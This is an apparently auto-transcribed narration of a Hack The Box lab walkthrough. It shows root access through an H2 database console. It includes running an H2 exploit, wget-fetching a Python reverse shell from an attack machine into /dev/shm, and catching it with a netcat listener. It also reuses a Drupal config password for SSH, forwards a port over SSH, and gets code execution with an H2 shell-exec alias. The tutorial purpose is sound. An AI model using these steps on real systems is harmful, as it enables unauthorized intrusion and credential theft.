this exploit on this box now, because earlier when we tried to execute this port h2 console, it says remote connections are disabled on this server. So what we'll try to do is now we can just check for netstat. Okay, and we can probably give help over here to get the modes. Yeah, so we can use netstat over here again, and we can enter all connections. We can see all sockets. We can enter A, we can enter L for listening. I think all adds that up. We can enter numeric so that it does not resolve the names, and we can enter V probably. We can enter V as well. We can enter P, I guess, programs, so that we get the program names as well, but we do not get for each one of them, so we'll see that. But yeah, we just add that and let's just hit enter, and obviously we get something over here, multiple things. And what we are interested is in that port 8082, because remotely we were not able to access it. So if we see that port 8082 is in listening mode. Okay, so that means it is listening. So that's why we'll try to target using that exploit one. Okay, so since we are in the local system now, so if we do netstat, we'll just get that exploit p1 file, and we needed to give that edge switch, because if we run without it, it's gonna say that enter this edge switch or the help. And also you can optionally enter the JDBC, I think it's the SQL database, I guess. So it says optional, I guess. So let's just try running it with H itself. So if you do H over here and 127.0.1 and also 8082, if you run this 8082, why? Because not because it's mentioned over here, because that H2 database is running on 8082 itself. So let's just run it. It says attempting to create database, shell succeeded, and it looks like we have a shell, which is H2 shell. I don't know what shell that is, but it looks a little bit weird, and it says we are root. So that means obviously we are over here as root. We do ID, we are as root. So if you check LSLA, we're in the root directory over here, and we can get our root txt file, obviously because we are root. So we can get our file over here. One thing is, if we go back, it says invalid command. We cannot go back. It's a limited shell, even though if we are as root, and I cannot hit backspace as well. So what we can do is we can exit this shell probably. We can create a Python file, or you can use wget, I guess. Create a Python file and try to upgrade that shell. So in short, we got root, we got our root txt file over here. So what we can do is we can just try and upgrade this shell first. So let's see if we can use wget command over here first. I'm not sure if we can use it, because usually it will show us the usage over here. Let's just see. Wget 10.10.14.28 8000 test txt. See if it works. Did we get, yeah, we did get this get request over here, so obviously that works. So what we'll try to do is we can just try to create a file, exploit, just get this file, sorry. So I have this reverse.py file, Python reverse shell file, which I've saved it on my system. So let's just do that. Locate reverse.py. Okay, we can just get it from here. So this file I have like created using like the Pentest monkey. I have not created by myself. I've taken that Pentest monkey Python reverse shell, this one, and try to format it properly, because I very frequently use Python reverse shells in the Linux machines. So probably you guys can do it as well. So I'll just show you the contents of the file. So this is what it is, simple thing. I'll just modify this to 28 and port 555 because 444 is in use. User bin Python, I'll change it to Python 3 because Python 3 is present in the box, not Python. And we can use wget over here. This thing does not work, backspaces don't work over here for some reason. So I'll just type out the command over here probably. Wget 10.10.14.28. Another thing is try to avoid typing in cherry tree. I'm just using it now. Just have the mouse pad or something, because sometimes with the codes it's gonna act funny. Okay, so do that and reverse.py. Can have the reverse.py file over here and probably output it to dev shm reverse.py. So oswitch for output, wget is getting the file from our attack machine, port number 8000, because we are running the HTTP server over there, and also the reverse py file which we just saw, right, this one. So we are trying to get this file, and we are going to use the capital O switch to output it to dev shm reverse py file. Okay, let's just do that. I think it's done. So quick, I think the file is transferred. So let's just try to chmod this particular file first. So chmod 777, try to do that and try to run it. So before that we can just probably nc nvlp 5555. Okay, try to run this file now using Python 3, because I think we can run Python 3 over here. Run this dev shm file, see if it works. Yeah, it did work, and we did get a proper shell. And if we do lsla, we can very well go back. Yeah, so this is like the whole shell. Probably we got this limited shell, but we can, I know as root also, because it's some h2 shell, we can upgrade it to this whole shell over here. So, okay, so this is how we get root in the first scenario. So let's just close this now. We got root, and we got root over here itself, but just wanted to show how to upgrade it. Okay, so what we'll try to do is just exit this for now. Quit. Okay, so just because I wanted to get back to the user terminal. Okay, so another thing is, when I do the box first, if there's web application involved, I always check for the config files. If there are multiple web applications involved, I try to check all the config files present over there. So since we had Drupal over here installed, what we can do is Drupal config file location, we can do that, and it says the settings PHP file is located in your Drupal directory sites default settings. So I think that the mostly it's like the var variable, so var www cd www and play. So we'll go to HTML. So this is where most of the time your web application is going to be placed, the files. So we have HTML over here, and it says, like, obviously you have multiple things present over here. So it says the PHP Drupal config file is present in the directory, Drupal directory, which says sites, default and settings. So let's just look into that. So let's just go to cd sites, then go to LSLA. There's default over here, so let's just go to default and do LSLA again, and we have settings PHP over here. So what we can do is we can cat settings PHP. It's a huge list and huge file. Probably there'll be some password or something present over here. Most of the times I find password in web applications config file, but it does not actually work with any user. So let's just see if we get something over here. We see that we have a database name, username, and we have a password that says Drupal for Hawk. Okay, so we can just try to copy these things. MySQL database. So we can just paste it. I don't think we require this. So we have pasted these things over here. We have Drupal for Hawk. So I don't think we have a username that is Drupal. So if you do cat etc password, don't think we have a username that's Drupal over here. So obviously we have a username that is Daniel, and obviously it has some weird shell that is Python 3 over here. So, and we saw in the home directory itself we had a user that is Daniel right over here. So let's just try to SSH into the box and see if that works. So what we'll try to do is we'll just try to SSH Daniel at, obviously you can try for multiple other users as well, okay, so not limited only to Daniel, but over here Daniel has a home directory as well, so probably we can try to SSH. We can go to Daniel and the IP address 10.10.10.102. It will ask for password, so probably you can just enter this Drupal for POC and see if this works. So it does work over here. I think if you do su Daniel as well, it should work. Su Daniel, enter the password. Yeah, it did work. So just one quick thing, like a tip, you can use su also to get it worked over here, and we have SSH present over here. So but this thing is like some Python shell, okay, so probably it's like running few Python commands over here. So if you do who am I, it's not going to work, it's going to give an error. So probably what we can do is, as always, how we upgrade our shell, right? So we do like import pty, then we can do pty.spawn, we can do bin bash, and that's it, I guess. Yeah, so if you do am I now, so that's worked. So because that's how we got a shell, and the reason for this Python thing is because over here it's mentioned that the shell should be, login shell should be Python 3. So that's how this thing is happening. So obviously you can check for sudo l over here, but it says password for Daniel, so we can probably add that Drupal Hawk and see if we get anything. It says sorry user Daniel may not run sudo on Hawk. So Hawk is the host name, so obviously we do not get anything, but the thing is we can SSH into the box, so we can probably do port forwarding over here. Just exit it. For Python you have to exit using this function, I guess. Yeah. So what we can do is we can do port forwarding over here, and to make it, let's just close this and let's just open it over here. We have this over here, we are over here as www.hawk, and since we do not have access over here, okay, since we do not have remote access, if you load this, obviously we do not have remote access, what we'll try to do is we can use SSH, okay, and we'll try to port forward our port. So we'll be using L over here. We can enter our local host IP address of the attack machine first, or probably we can just enter with the port. We will just try that first and see. So we just enter a localhost port number, that is probably we can enter 8082 itself to make it easier, or we can enter 8000, probably 8000, that Python thing is running, so we can enter 8001, and we can just add the colon over here. Then we'll come to the target machine's port. Now over here we saw that, you know, if you do netstat, I'm not sure if that's going to come, netstat. So over here earlier we had seen that port 8082 is listening, right? So this thing, it means like localhost. All these things means it's local host, okay, except for this obviously. But here, the thing over here is that it's localhost. So what we'll try to do is, we'll just try to add localhost IP address, that is 001. I know you are confused that this thing is blank. That means it's localhost. It's as good as 000. It's as good as this thing over here. So we'll do that, and we can enter 8082 because the port over here is 8082. So this is the port which we will try to connect for my attack machine, and we'll try to connect over here. So we'll just use Daniel at 10.10.10.102. Okay, we'll have to give the password. So copy it, paste it. Python thing worked. You do not have to do anything. Once you do an SSH, that port is already present. So now you have this present. Sorry, this we are trying to attempt to the target machine, right? Target machine's port. Sorry. Yeah, target machine's port. But what we'll try to do is, we'll just modify this to .1 and 8001. Why? Because this is the same port and IP. So if you do not enter anything over here before this port, it's, SSH will assume like, hey, you know what, you are mentioning the local port itself. It's like by default it's going to take that. If you enter something, then obviously it's going to be different. But yeah, you can enter nothing, and it's going to be like this attack machine's port, that is this, it's going to be forwarded to the target machine's local host and 8082 port, that is this. So what we'll try to do is, let's just load this, and if you see, we get a H2 console over here. Okay, so this is what it looks like. So another thing is, let's just quit this again. These are just small tricks probably, and it may be helpful sometimes when you cannot access applications remotely. So we can access, I don't know why this thing is not exiting. Exit. Okay, so let's just try this again now. So just to make it easier to understand, I guess, so we can enter 127.0, my bad, 001. So the first range of the first IP address and port belongs to the attack machines, that is my Kali machine. Okay, I'm gonna send my Kali machine's port connection, whatever I'm sending to port 8001, to the target machine, because obviously this is not a target machine's IP, but we are connecting using SSH, right? So once it gets connected, it's going to port forward to the target machine's local IP address, that is your local host IP, and the port 8082. Okay, so this is how it's going to work. If you hit enter, just copy the password Drupal for Hawk, paste it. We do get this Python thing. Let's just load this again. My bad. Okay. 127.801. We do get this thing over here. Okay, so this is how it is. Small trick I think I had done in the previous box itself, and for port forwarding, so you can use this as well. Not sure why it does not exit properly, but yeah, you can use this entire thing. So what will happen is, I'll just show you all in this diagram over here. So delete. We have this port, that is localhost IP address, okay, and we have the port, that is 8001. You can enter any other port over here, that does not matter. So what SSH will do is, once it is, you're giving a command, right, this first command over here. So what it's going to do is, SSH is going to take this connection which is coming in your attack machine, okay, that means your Kali machine. It's going to take that connection, and then because it is connected to this target machine, it's going to send this connection to this particular IP address. Okay, so let's just consider this IP address as well. Just add it over here, 10.10.10.102, and also one more over here, that is 127.0.0.1 and 880.8082. So this is the port where that H2 database service is running. Okay, so we have this over here, we have this network IP address, and this is the localhost IP address, and we have this thing over here. This belongs to Kali and this belongs to Hawk. So SSH is obviously first gonna connect to this, and then it's gonna connect to this Hawk system. Okay, that's how it's gonna do the connection. So once that connection is done, I don't want to make it messy. That's it. Once the connection is done, this is successful. Okay, so like a tick mark. This connection is done. Whatever data we send to our attack machines, localhost IP and this port, which we have mentioned over here, it's going to go and get forwarded since the connection is already established, right? Okay, I'll just draw this green line over here which says connection is established. Well, I think that's to this connection is established. Okay, just ignore this, but like I know it looks a bit messy, but yeah. So we'll just look into this other one. So once the connection is established, right, up and forth, okay, so when we are sending something over here, this thing is going to forward it to the target machine, this particular IP, that is the localhost IP address, and this particular port. That's how it's going to go, and vice versa. So that's how we get the access to this particular application over here. So we can obviously run it again without using the localhost IP address over here, attack machines, because that's how SSH understands it. So you just hit enter. We'll enter the password over here, that is Drupal for org. Paste it. We get something over here. Okay, so we have this page over here. Obviously, the database, H2 database. We just look at tools, I guess. There are some things you can do with backup as well. You can just try to check it out. You can probably get some file access. You can read the root flag, I guess. So obviously we do have that H2 database file name, right? We had seen from the process over here. This is the file name. So you can check for exploits over there. H2 database 1.4.196 exploit. We can check for multiple exploits over here. So we can check for CVE details as well. Why CVE details is, okay, there's another thing. Let's just check for vulnerability. Okay, so exploit DB, CVE details, and search lab. Okay, so it says execute code for H2 database, vulnerability type, you have multiple, okay, and it says references for it. So you have like multiple references given over here. You can probably check it out because the CVE pages obviously have like some POCs or some exploits, like, there is some exploit DB, so there's a exploit available, so it will be having a link for that or particular POC, something like that. So there'll be multiple things over here to see if you get something, and obviously we check out this particular page over here and we see that we get some POC which says, in short, if you read, so probably we can create some function over here from Java code and we can achieve remote command execution. So you can go through this entire thing, and exploit is present as well, but for some reason this exploit, I think it does not work properly as intended, but you can use the POC over here. So we see we have the same page, right? So first you have to run this particular shell exec command, then we have to call shell exec and add something like ID and see if we get remote command execution. So obviously the first exploit which we did run was something similar to this, but this exploit code, I don't think it works that way. Was it the same one? We'll just look into it, I guess. Get session host, get cookie host, different login. I think it's a bit different, I guess. Yeah, I think it's a bit different. So what we'll just try to do it manually. In short, we need to, add this particular command over here first, as seen over here in the GIF, right? You can see it. So what we'll try to do is, we'll first have to, before that we have to try to log in inside. So we have something which says JDBC class, JDBC URL, and something over here, username this. Let's just try to connect and see if it works. So it does work, and you can just log in randomly over here. And another thing what we can do is, we found the credentials over here, right? That is Drupal. So we can connect to this Drupal database over here. So JDBC URL, that is this, H2, and the Drupal connection. The username is Drupal, and also Drupal for Hawk. So you can do that and we can connect. So we do get connected. So what we'll try to do is we'll just try to get that exploit working. So we can just try to run this, and probably there is some execution, oh my bad, some shell exec command which we are trying to create, some function, and then probably we are getting some remote command execution. See, there's exe cmd present over here, something like that. So let's just try to run it, and it did run, I guess. So we can just clear this for now. We do not require this anymore. We can just run the call shell exec id and see if it works. We are calling this shell exec command which we just created right now. Okay, so if you do id, we get over here output as id is equals to root. If you do who am I, my bad, just click run and we get root over here. So what we'll try to do is we'll just try to keep this as it is, keep this file over here, and we'll try to run the reverse py file, and we can just probably add nc netcatalyst. Now I know it looks a bit messy, but let's just have it on the same page. We'll just go to dev shm directory where we had saved that reverse py file earlier, right? So probably can just check for lsla, and we have this reverse.py file present over here. So let's run it using dev shm, and we'll give we'll just cat it reverse.py. We have this particular port over here. Let's just leave it as it is, because if we close this, then obviously that connection over here would break as well. So if we do run over here, we have who am I. So what we can do is we can enter python 3 over here, dev shm, and reverse.py, and try to run it. It's executed and we get our root shell over here. So that was the box, and we get our root.txt file as well. Where is it? Yeah. So if you guys like this video, give a thumbs up, and if you all have any queries regarding anything regarding anything as the ciphers which were used, AES and everything. So if there are any queries, drop it in the comments below. And also if you all have not subscribed yet, do subscribe for more upcoming videos. Okay, thank you.